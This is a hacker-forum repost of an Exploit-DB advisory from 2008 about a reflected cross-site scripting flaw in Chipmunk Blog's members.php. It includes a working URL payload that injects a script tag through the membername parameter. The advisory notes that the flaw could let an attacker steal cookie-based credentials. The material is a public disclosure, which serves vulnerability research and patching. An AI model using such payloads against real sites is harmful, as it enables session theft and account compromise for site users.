Exploit Chipmunk Blog - 'members.php' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31949
Проверка EDB
  1. Пройдено
Автор
SL4XUZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3186
Дата публикации
2008-06-23
Код:
source: https://www.securityfocus.com/bid/29883/info

Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/path/members.php?membername=[XSS]
http://www.example.com/path/members.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
 
Источник
www.exploit-db.com

Похожие темы